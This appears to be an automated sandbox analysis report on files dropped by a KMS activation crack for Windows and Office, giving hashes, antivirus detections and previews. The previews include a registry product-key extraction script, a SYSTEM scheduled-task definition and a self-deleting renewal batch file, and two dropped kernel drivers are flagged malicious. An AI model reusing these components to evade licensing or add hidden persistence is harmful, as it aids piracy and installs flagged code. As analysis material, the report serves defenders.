C:\Windows\System32\drivers\DvLayout.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):278352
Entropy (8bit):6.576985388464652
Encrypted:false
SSDEEP:6144:ln6zHmUtixjU3pEeS2wzjqyt0QcCNt9uJQd5fAObyj2PBLC:lnLU0xjU3pEH2wzpduJQd5fA2PBu
MD5:99B17FCCE8D54EA90FF5C0B9EF4FCE73
SHA1:4B987A5EBE11EF75B337FAECD240E541487F6A4E
SHA-256:CB6EE43394BB13F4E5FBAD2DADB3F4D0D5C87909E89A5C1CC9A5EF6F49B64C64
SHA-512:DFC7EA925B4159BAA91931F02C41F5C66CCEBBF652E830E2DF66C30477187495B6BB5307FFDF38C6C34DB5F1BD40FED723EA76C4F86D0752634B3A219E7FAA11
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 69%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./q..k..}k..}k..}.{.|f..}.{.|...}.{.|}..}.y.|j..}.a.|z..}.a.||..}.a.|:..}.{.|d..}k..}...}.y.|h..}.b.|h..}.b.}j..}k.}}j..}.b.|j..}Richk..}........PE..L....y._.....................P....................@..........................`.......U....@.................................|...d.... ...............,..P....0..8$......p...................@.......p...@............................................text...$........................... ..`.rdata..............................@..@.data...d...........................@....rsrc........ ......................@..@.reloc..8$...0...&..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\System32\drivers\KMDF_LOOK.sys

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):52176
Entropy (8bit):6.168313221432706
Encrypted:false
SSDEEP:768:kzVadQ7HTk82VE9KRzr9pyOe4ExHtq6Cbf2Q+IRNJ4Z4:kOQ7zvgEHoUqNJ42
MD5:5C2BC53BF68894CD591C5C7D1E690F41
SHA1:C4DDF1F1582D708BE83B8E75CA889F78ED387055
SHA-256:F0BBE441E1C2B926CB215699690D67526E4220534703A7FC4BB9BB20479F2CC2
SHA-512:EA922918C127ABC170EAACF2429483F2300952B3124328375E48DB524625B29741738A9250DCE8DF2D889148F5E04FB73CD3ACECB9FFD5DFD44CC8531218507B
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 88%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z..p>..#>..#>..#7.7#=..#7.,#<..#e.."9..#e.."$..#e.."8..#e..";..#>..#y..#..."8..#..@#?..#..."?..#Rich>..#........................PE..d....0.T.........."......n.....................@.............................P.......o......................................................d ..P....0..........8............@..D...0t..8...........................pt...............p.. ............................text...<_.......`.................. ..h.rdata..L....p.......d..............@..H.data....s.......*...t..............@....pdata..8...........................@..HPAGE................................ ..`INIT......... ...................... ..b.rsrc........0......................@..B.reloc..D....@......................@..B................................................................................................................................................................

C:\Windows\System32\drivers\KMDF_Protect.sys

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):54224
Entropy (8bit):6.160827902341627
Encrypted:false
SSDEEP:768:865Pg3db7gc9a28CXCgWmOnyX7AO7MCzsrDX8Ztqo8MoUSnS92OgZxSm:82ItbBMK9MOv5ZtawrS
MD5:26153A4FAA0B3573E4BD461C008059FB
SHA1:8B74A646C4300E257E5FDE076C7E3067CD090D60
SHA-256:D48727E1C1550937470D32022762B924DD945457C7CE8962F65B5DE77D3180CA
SHA-512:2104D0580F2E65F7F3D1657702D8B530685FC05121F28297147E04F6FA2025E273C4AC6FB0774160489EB963675A444FC487D4C029325A1C29BD52F89D4DC7B8
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.BZx.,.x.,.x.,.q...{.,.q...z.,.#./.|.,.#.(.k.,.#.)...,.#.-.}.,.x.-.=.,..(...,....y.,.Richx.,.................PE..d....nXT.........."..........N.................@.............................0......^.....`A................................................d...P............................ ..X.......8...........................................................................text...V........................... ..h.rdata..............................@..H.data...\4..........................@....pdata..............................@..HINIT....8........................... ..b.reloc..X.... ......................@..B................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\7Z.EXE

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):587776
Entropy (8bit):6.439962628647099
Encrypted:false
SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
MD5:42BADC1D2F03A8B1E4875740D3D49336
SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\DigitalLicence.7z

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):475105
Entropy (8bit):7.999623658383902
Encrypted:true
SSDEEP:12288:0BdMAMRRQzWvIyoCnF7EhprE88oWL3cdtbaDB0M714PuMOmIACEh1cdu:SdpMPY2JF7En8fMzqb4PuM7IyMu
MD5:9AE06E4DB00F08CD6A1F77FDCC645427
SHA1:376C01217ABB3D8D4F72DE4FDED8DCF2C0CB4367
SHA-256:BABBA1B9FB634D804CD66944A3E97EB4BE36AB34AC56C05D007014EC73E9386E
SHA-512:457E01C333CEFF74830B7B021D782F363CA751831BAA066D9D5AFCF9F2D389580178EE18DC052D1855C413FA7A05BC68BBE74D1F0D4DA620BA5D84AFB4E55511
Malicious:false
Preview:7z..'.....z..?......%.......0.f-..5..].w......3.a`.....f...'D.$.."8..S..D...w...g...*..m.D.?....N.8.K..e....n9Q........>.....Z....B.t..0....Dx-...8x.E..V.l...a....{Zu7.U?..@w..S..H.^..aW.[.`be.C?.*8.....?....B<..p.t....H.!.I..49.]..(....4#.c...{.m`:vSB.f(..f...)f..8...7}.w...R.A)t. _i.D...0...MRFJ......R...i..?Sa...S.\..<...K.b...&d.O.4.V.=..t.x...J..(>..w...X.L..A;@..|..[...`(.j}.}.7...M.p..n?..X....@.....].........q.........q'.ld._...{./u;...H.......c~79v..jr=.z........dI:?.....(........S...~.h..f.>L...Y......9.f.&d..G..S.F%.....g........1..R...7/....,.=J.}.f...?.v..D..T..3.Q.5*..`b..us0<h....= ...W...P.`$XI......$.=...E.a.Z.hlv...=/LbB.5...Vo.........0..r..}@.}..%YV1<.7y.L.).FR....U.S.h.q...^..:h.....o.VY...g;.'.Qp.n.O.c...gP..._...]G.\?0.n.$z..WC...1.'.T:./..w....9..I......[e....q.s4S....D_../0"`.X.z.(-~.X.u.g...Q.9...W..-"..A..}.W..O..G...=..?Cg.o9F.8....Sj$b/8..}.5t......<...n.U0..\.Kh.........u..V./!p..IRy(......Pp.7..N..Uu.m8.Y*.l.(.

C:\Windows\_temp07242019502489\GetProductKey.data

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1657
Entropy (8bit):5.01969535530697
Encrypted:false
SSDEEP:48:DVe8NhjPG9lrRtFf1f0WSIoQCvYBBNyJS1GDof0psks2rVb:DVe8NhjuFtHf0rQCwBBNyJS1GDgOFs2l
MD5:4C89CFC5BAF95E76753A0B7EDC719FA8
SHA1:9BBB6BE39966F5BEA18719F0B5F8A40DF34C2827
SHA-256:0B815BA61B8C7DFA70B7C35D686E910E1E15222FEFC3F0927C0C64BDB50A0BA6
SHA-512:EF0D0BD247BC5FC0B55A40D5C6D7D5DB9068209898E371DB5035C91257B90FBC750A993FE76C58F08AF1956B364AC363C5D6322ABA0373FAA67A55F4E7E532DB
Malicious:false
Preview:Option Explicit..Dim objshell,path,DigitalID,ProductKey,edition,keys..Set objshell = CreateObject("WScript.Shell")..Path = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\"..DigitalID = objshell.RegRead(Path & "DigitalProductId")..ProductKey = ConvertToKey(DigitalID)..Save ProductKey....Function ConvertToKey(Key).. Const KeyOffset = 52.. Dim isWin8, Maps, i, j, Current, KeyOutput, Last, keypart1, insert.. 'Check if OS is Windows 8.. isWin8 = (Key(66) \ 6) And 1.. Key(66) = (Key(66) And &HF7) Or ((isWin8 And 2) * 4).. i = 24.. Maps = "BCDFGHJKMPQRTVWXY2346789".. Do.. .Current= 0.. j = 14.. Do.. Current = Current* 256.. Current = Key(j + KeyOffset) + Current.. Key(j + KeyOffset) = (Current \ 24).. Current=Current Mod 24.. j = j -1.. Loop While j >= 0.. i = i -1.. KeyOutput = Mid(Maps,Current+ 1, 1) & KeyOutput.. Last = Current.. Loop While i >= 0.. keypart1

C:\Windows\_temp07242019502489\HEU_Configuration.ini

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:Windows WIN.INI
Category:dropped
Size (bytes):2908
Entropy (8bit):6.126229204774281
Encrypted:false
SSDEEP:48:qhviJbGJu2OIe/2OpQOHd3GytLXtBJFRK6lygPFePuU6u2PaEoL1uIyF8pE9aOt3:qEJbj2e1lwyrBzRKUyEyuU6vaEoxuIyF
MD5:B74971F1FE581CF08E8F69124F5F2BCD
SHA1:DC56FF99D0204BD44928A925054F52D1C38C68F1
SHA-256:B7DEA91768212BC915345F82B9165F3BDEF0F4333EA6738AC800758296FB5B00
SHA-512:DD66BF6D9A03EB10027AE739AB2A97A481FCA8778A4A5546275A2E266FD022B1E02B91D3E2D37D86B6C4BB7D895575B0B4CFA6D7C8289FF635246585FBDE366C
Malicious:false
Preview:[Windows]..Edition=..Key=....[Office]..Office2010Key=..OtherOfficeKey=....[UninstOffKey]..Office2010Last5Key=..OtherOfficeLast5Key=......................======================================================================...................................HEU_ConvertWindows.ini.....HEU_KMS_Activator_*.exe.......======================================================================....1.....Windows ..... 1.....[Windows].."Key="............Key=XGVPP-NMH47-7TTHJ-W3FW7-8HV2C......2.....Office ..... 1.....Office2010........[Office].."Office2010Key="........ 2.........Office(..Office2010)........[Office].."OtherOfficeKey="............3.....Office ..... 1.....Office2010........[UninstOffKey].."Office2010Last5Key="......(.........5.).. 2.....Office(..Office2010)........[UninstOffKey].."OtherOfficeLast5Key="......(.........5.)......4.....Windows10...... 1......Edition=......,....Edition=Education...

C:\Windows\_temp07242019502489\HEU_KMS_Renewal.xml

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:XML 1.0 document, ISO-8859 text, with CRLF line terminators
Category:dropped
Size (bytes):2240
Entropy (8bit):5.3781166532340645
Encrypted:false
SSDEEP:48:cCu+DiTl4l0pbxE6Q2L60uydbQx3YODOLedqBslIN2uS:Lu+DiTl4wtar0uydbQZdqBslI4
MD5:A381B30E51AC126F51F421E082DE0EA7
SHA1:5F847E828BD7B5DD0D02F4C505FCB084C69B068C
SHA-256:84DE47C26A7379EF5C31AD5452372E7477BFB739E2684D31C0DB22CBED56D401
SHA-512:89CACEE08884390F06F79E4E41481EB90363099AA7DA960EE3CEF8CFCEF03623105FE0BE7AD2C88077B42EBC5EFB21E5D713607850F48A191708298F34323180
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Source>Microsoft Corporation</Source>.. <Date>1999-01-01T12:00:00.34375</Date>.. <Author>RPO/WindowsAddict</Author>.. <Version>1.0</Version>.. <Description>.30..............</Description>.. <URI>\HEU KMS Renewal</URI>.. <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFX;;;LS)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-4)</SecurityDescriptor>.. </RegistrationInfo>.. <Triggers>.. <CalendarTrigger>.. <StartBoundary>1999-01-01T12:00:00</StartBoundary>.. <Enabled>true</Enabled>.. <ScheduleByDay>.. <DaysInterval>30</DaysInterval>.. </ScheduleByDay>.. </CalendarTrigger>.. </Triggers>.. <Principals>.. <Principal id="LocalSystem">.. <UserId>S-1-5-18</UserId>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Prin

C:\Windows\_temp07242019502489\KMSmini.7z

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):1807018
Entropy (8bit):7.999894560057019
Encrypted:true
SSDEEP:49152:AvAFxpIyAuLjnXQsP2snIbrYpnvnjo8yOgICCvi:AvAFLIGLz5PtnIfYFnjoG0
MD5:E95E0A57CAF3E24C190CD303AABABA7A
SHA1:25C8A267FE760BAF9B638D39AF73806034B6B3E8
SHA-256:CE54BD0CA93B73BBBFC2AFBB2C6F7159D83A3A5CAEB92146D850765A1B6A9DA0
SHA-512:033E112700C8C2BB4E4D68852AD959608B7BE4FA46FABDE41C05FFEA69982A8F440684AA93F0A686D65FE5E4394B7D5D3DFD1924D44B2ABBF6DA0256B9B49E9C
Malicious:false
Preview:7z..'...>...f.......$.........&......]........s...O.u....S8..u.+.w......".w...4. b......A`...5T-5.5..2.........K'......p!.......h.I.I....K..y~.s..o....._M........s.M4..GqcP..a.\..].4l.{.H..{...(+.......7>8p....j.9j..J..:.8F..c.4y3...vP.].V(p....R=.M,4.X.-..h.^...3.H..Kn..xO.&..|..P.u....q8..hRt..._..hE.o...c5..hw...l.I......n,H...A......J...p*..$.0..'.V...1)..[w.Rkk...n`.]3o.g...E.Q...E.Ugff.%...t.x...{...;.D.W.,.V[..@..Y.?h(...5..>&VNp..T.> .2...K?...A.....%.|P6.Ekyv.`..@F....T...F...7...I....b... .w?....J..... .`a.........j.>.-...w.d.4\.'a............l.0g.Sh...]..dh<..3.4a.nT../]v..3C.p-,..ih.|.J...`o..v.....z....Y...+.(..Sb..a.\M1....C9+\....GL.._.'.,a..Vo..G...1U... d|...G.]....V*......E{+.J.M..."..\-..J.I.K...Isgx.?.. `...W3...B=.n..`.....w.la.5.m".2.........`@..L.....n......G.&...d.d.=.dLT.5:S*U |*.....a..#.b^|.S..1.O.....7{.l..'HB%..0e.s.~U....x...W%U...9wO.O..ZKG..:.~V_.....8.....*..y.p...%...J@.......u...........~}R.T.4.w.W.}..A

C:\Windows\_temp07242019502489\Office2010OSPP\OSPP.VBS

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):49433
Entropy (8bit):4.6791150913001704
Encrypted:false
SSDEEP:768:yzG3Pbt5Q8RxIQs191LpE/hygKoypaXHDvjw3OnCYk2N6aI3FPqlrl1VKXP+Pm1S:ya37QdgGpwZV
MD5:572E9A87757AC96C7677FD1B1B113C55
SHA1:9C8B96971997CD2DC0ED14F19DD9BC56D3348C3A
SHA-256:008CF05944053116A095AD466561D3FD4BE8A7DE79E5ADA7C5DAAB492F730465
SHA-512:BF670754942CFA839DE4A31676A3BA2AC8CD1A00DE6F1B70AFF995E14A9C489E996E9A019898EC3470A11D02C14AB7A8FE4855A8F028D6B4EA987E51411D7BE3
Malicious:false
Preview:'////////////////////////////////////////////////////////////////////////////////////////..'////////////////////////////////////////////////////////////////////////////////////////..CONST wshOK =0..CONST VALUE_ICON_WARNING =16..CONST wshYesNoDialog =4..CONST VALUE_ICON_QUESTIONMARK =32..CONST VALUE_ICON_INFORMATION =64..CONST HKEY_LOCAL_MACHINE =&H80000002..CONST KEY_SET_VALUE =&H0002..CONST KEY_QUERY_VALUE =&H0001..CONST REG_SZ =1..CONST OfficeAppId = "59a52881-a989-479d-af46-f275c6370663"..CONST STR_SYS32PATH = ":\Windows\System32\"..CONST REG_SPP = "SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform"..'////////////////////////////////////////////////////////////////////////////////////////..CONST MSG_NOREGRIGHTS = "Insufficient rights to

C:\Windows\_temp07242019502489\Office2010OSPP\SLERROR.XML

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):33019
Entropy (8bit):4.817205605590509
Encrypted:false
SSDEEP:384:UtZhdl54F7qir44eZut5tCTmZKpdBcwOvHWd+NVLVGZwZkIVYaBCobd/q5NvSVly:Iswk6CLzz9Dl6jSz8d
MD5:DF1EF05879E06C5F09F3E1022F37B5CB
SHA1:23AAAC40BAEC28397BB59CFA584E165062D18506
SHA-256:D49ADF2DABBBF6AA43CE4E336AF4F768207DF75302EBF568A94A5350AAC988C5
SHA-512:78F0D21538483D3BAC9D8B409554AC89A98A4943666F0FF88207831AB3E1D264C2EFA0EA0E4703375AA15516809353F9B7477561A0A4FFE0B930B3E39F8B7E07
Malicious:false
Preview:<Strings>..<err0xC004B001>The activation server determined that the license is invalid.</err0xC004B001>..<err0xC004B002>The activation server determined that the license is invalid.</err0xC004B002>..<err0xC004B003>The activation server determined that the license is invalid.</err0xC004B003>..<err0xC004B004>The activation server determined that the license is invalid.</err0xC004B004>..<err0xC004B005>The activation server determined that the license is invalid.</err0xC004B005>..<err0xC004B006>The activation server determined that the license is invalid.</err0xC004B006>..<err0xC004B007>The activation server reported that the computer could not connect to the activation server.</err0xC004B007>..<err0xC004B008>The activation server determined that the computer could not be activated.</err0xC004B008>..<err0xC004B009>The activation server determined that the license is invalid.</err0xC004B009>..<err0xC004B011>The activation server determined that your computer clock time is not correct. You m

C:\Windows\_temp07242019502489\OtherOfficeOSPP\OSPP.VBS

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with very long lines (597), with CRLF line terminators
Category:dropped
Size (bytes):105538
Entropy (8bit):4.985953705856459
Encrypted:false
SSDEEP:768:cE863JLs+lPbt5QmRxIQsNI9dmwPpEW4hygKoypaqrxkV3h20NtMDJI0YlBsYk28:F8fEzb/rgGpRrjDJkCkRFklYWCDUb
MD5:885B4DAE3623B427B8F04A7BC88780B9
SHA1:8B743A9749FA6EA82C3D1554965E1BCEF2567173
SHA-256:6BC8E3991DA8C6527B3588E8F95068665918B685299CBB16BA6CC0C484BFE072
SHA-512:C5CABAAF9321A63D679014E7B27271181157A76A1888D58E2E5E44D5ED79EF1E70C1173390E2B1CF49327AD2559A2D1A6DBDB0072E437A055CFBA9AACE78DC13
Malicious:false
Preview:'Copyright (c) Microsoft Corporation. All rights reserved...'////////////////////////////////////////////////////////////////////////////////////////..'////////////////////////////////////////////////////////////////////////////////////////..CONST wshOK =0..CONST VALUE_ICON_WARNING =16..CONST wshYesNoDialog =4..CONST VALUE_ICON_QUESTIONMARK =32..CONST VALUE_ICON_INFORMATION =64..CONST HKEY_LOCAL_MACHINE =&H80000002..CONST KEY_SET_VALUE =&H0002..CONST KEY_QUERY_VALUE =&H0001..CONST REG_SZ =1..CONST OfficeAppId = "0ff1ce15-a989-479d-af46-f275c6370663"..CONST STR_SYS32PATH = ":\Windows\System32\"..CONST STR_OSPPREARMPATH = "\Microsoft Office\Office16\OSPPREARM.EXE"..CONST STR_OSPPREARMPATH_DEBUG = "\Microsoft Office Debug\Office16\OSPPREARM.EXE"..CONST REG_OSPP

C:\Windows\_temp07242019502489\OtherOfficeOSPP\slerror.xml

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):36336
Entropy (8bit):4.835301983494741
Encrypted:false
SSDEEP:384:UtZhdl5cFZFqCr44eZutlCTmZbpdBcwOvHWd+NVLVGZwZkRVYF2IlTBCobd/q5Ns:YUkZLI9Dz6fZEz8d
MD5:36F7DADFE84E62DA00292D0569C3F523
SHA1:95D03EBD29CDCB908EFD78A0A945D848B6F035E8
SHA-256:B3378A3178F3E52094DB20E8A828011CD8882017919522A544BAEF3057BD11D3
SHA-512:1E4C952A4C1BD0BCBC9FBAF1370DA595A2E97ABAE854A8CCFD276ECB9DD8ADF55117F3CE053BDBD45D87A761439764DCADA7564245025F3F97AB2CAA6A0B4691
Malicious:false
Preview:<Strings>..<err0xC004B001>The activation server determined that the license is invalid.</err0xC004B001>..<err0xC004B002>The activation server determined that the license is invalid.</err0xC004B002>..<err0xC004B003>The activation server determined that the license is invalid.</err0xC004B003>..<err0xC004B004>The activation server determined that the license is invalid.</err0xC004B004>..<err0xC004B005>The activation server determined that the license is invalid.</err0xC004B005>..<err0xC004B006>The activation server determined that the license is invalid.</err0xC004B006>..<err0xC004B007>The activation server reported that the computer could not connect to the activation server.</err0xC004B007>..<err0xC004B008>The activation server determined that the product could not be activated.</err0xC004B008>..<err0xC004B009>The activation server determined that the license is invalid.</err0xC004B009>..<err0xC004B010>The activation server determined that required business token entry cannot be found.<

C:\Windows\_temp07242019502489\ScriptDir.ini

Download File
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):87
Entropy (8bit):4.978871554845339
Encrypted:false
SSDEEP:3:kj/rN0nacwRE2J5xAI+dBGqT4T:kzrNcNwi23fWT4T
MD5:3ADA3C4BD6F9A7EEA09B2EF1EE8EF750
SHA1:BD0A1F8FF51714764AB31FBEB05F9DD6F7BA05D1
SHA-256:2A1A386FA86631D77900CBFB49F464FD29FD14F8D3800AF009305A8599969EB2
SHA-512:F03FA1B67571F118BF478615CCE4B0BDD5E040CD72AEABA7400E867DF489510BB61F7003549F552E3A541B3E85C1A61CC2DDBCBA3916FA3BA5EABF0200FCA647
Malicious:false
Preview:[Direction] ..Dir=C:\Users\user\AppData\Local\Temp ..Name=HEU_KMS_Activator.exe ..

C:\Windows\_temp07242019502489\SetupComplete.data

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):166
Entropy (8bit):5.0500117944636305
Encrypted:false
SSDEEP:3:/qQKVnil/I+KJbGqT4xLVXqta6dWuGqT4HJCaFtgPmGqT4KoZs+RMA:/kVn/pfT4xpd6d1T4HMaAcT4KopRMA
MD5:86649FF39833B7D35CC5B7884025BFC5
SHA1:BB4445B7C8A8A1609B499BC027CE8B2AA8AF3405
SHA-256:EFF981009C7DA55761B6DEA254C2BD6EA909CB46F27632FA471D597189D5FF94
SHA-512:965FD9B1272492E55EFA0C4B31EA2FAAEBEFBA32E4B03840C71451D8A22BF628991DA9A84EB0F16CA6FE302BDBB1AF5B0E65DEEAB31D51B2DFE54DC365580238
Malicious:false
Preview:@ECHO OFF..pushd "%~dp0"..start /wait HEU_KMS_Activator.exe /windows /renewal..if exist HEU_KMS_Activator.exe (del /s /q HEU_KMS_Activator.exe >nul)..del %0..exit..

C:\Windows\_temp07242019502489\SvcTrigger.xml

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):4258
Entropy (8bit):3.637219457662655
Encrypted:false
SSDEEP:48:yeiqq9oqAXvM5p+8wdsV7gP9oItLV2Qn1ab9Q9V9Lvara+iniudupRCRf9ufAuRy:cJ+z3Vvnkp+GdinigV9ll7UY5HAmzw+
MD5:ADE0007995DA8218A924EAE18DD5FFA4
SHA1:DE4480D869DF4E45E666E3BA74C87786D2BA01E9
SHA-256:6C4C7816D99652A6248E8877AC24D341B3D87BB1E7A6BE159EACBB6B6BC61352
SHA-512:25576DD5103C8F677452EDE6BBD1DED407F290741F0E30294DDFBE54D43BE98A7F9601A3D722A997041980DA083D7DE7DA9B2E9525D920CC207143BD60FFEE95
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...3.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n.<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n.<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.T.h.i.s. .t.a.s.k. .r.e.s.t.a.r.t.s. .t.h.e. .S.o.f.t.w.a.r.e. .P.r.o.t.e.c.t.i.o.n. .P.l.a.t.f.o.r.m. .s.e.r.v.i.c.e. .w.h.e.n. .u.s.e.r. .l.o.g.o.n. .o.c.c.u.r.s.<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.T.r.i.g.g.e.r.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.

C:\Windows\_temp07242019502489\cert.7z

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):515101
Entropy (8bit):7.999632298329647
Encrypted:true
SSDEEP:12288:hiUueKswiHeFY4aND7fBUNJA88M4n44EZVcHv5IoeOs9iX76vMHao:D5wE4a1W488MB9Z4BI9O76v9o
MD5:10A8C081F96DC74DACA5F0BA91045B36
SHA1:F7B32E796ABE8A806F40148F2E67EA8DC09F9490
SHA-256:1E1B06B1BDA8D90232F1B96C116603001C9F56EBCF28F2790533B5825BC475DD
SHA-512:7164F5BBFD6959E1D1D2809DCD42E46499DDD680FA9C8E521E88ECDFDBCFCE49C834580FEBC775785C9431EE87063A4909034C4B474FFECEB53C8C84B1775BCF
Malicious:false
Preview:7z..'...4~..........%.........-..3..]......,..B..:(.ZgL.1.E.M..a.....k..".C.]...r.oKq.o.b....E./.b.1ge......+.Q/T......O.z...R.r......{.....i ..].{...w...MyCfo ...$.<!.... .zq...)....h..s.J..O..}... ...9......Z.R#.Wq.......&1&.Tk.=.j.....,&.*..<.uz.Bh.2/W..d...B.|..Q.._D.V.f.q...RC..a..h..8...,....q..&~........m..k:,...;...*..i4.....S#.m+.s.I..o.az..I.b....;..+.....<.....Q.....eTs/..`..h.4.....8...........iIk.?.k.......n.i.....A.......e.dA=...T9.{...."P..J.w?e...a.g..D..x..e....Sa...X.0Z;Q..Q..K}...=.)&....b.[..$Xfw.=;...%.P.k....v.....+..?h..4pU.>.(e..L.S.x..F..3.PY.$..@.,d...5@.X.....aB... ........nt...yyC..w.h.l.......BM.._.....5..2....7...>.....i.....X6`....m[.Z.H$%..pS.)..8..f^..r".9....l.....r~.....)......6r.{...&G.........H......~.....}.YT..i.H....1.&5..n...'..K..3.)|J|>|.av.a....`xqv....1p]............U..s.G.<."..p|....QD6..'.._E(.h..H...L...i.}..m..r..........N..............t..49..........'Cj"....P.........O..V:\WHi....#G.S

C:\Windows\_temp07242019502489\digital.7z

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):862741
Entropy (8bit):7.999021184950542
Encrypted:true
SSDEEP:24576:c2/RWRiVf6KUw/KacmqZooybsSViudCbEio:cZiUKzEZAsSzaS
MD5:F7229B58B678638D30DE2AA2E2B23D08
SHA1:37C374C09921C968853D220A3288E087F3DBB0AF
SHA-256:25E1EE2D65C00543E5855299CE396F52C411D8E8E49A8FAB4D90A2B21E65711C
SHA-512:2DC4BAE503EFD6A1E56C09431524AB9207E1A63AAF4E63A912A389F3831895E3794AC1F632EB353036AA477521DFFFC6F0FF78CA79938F29FAB68FEA9625C4F3
Malicious:false
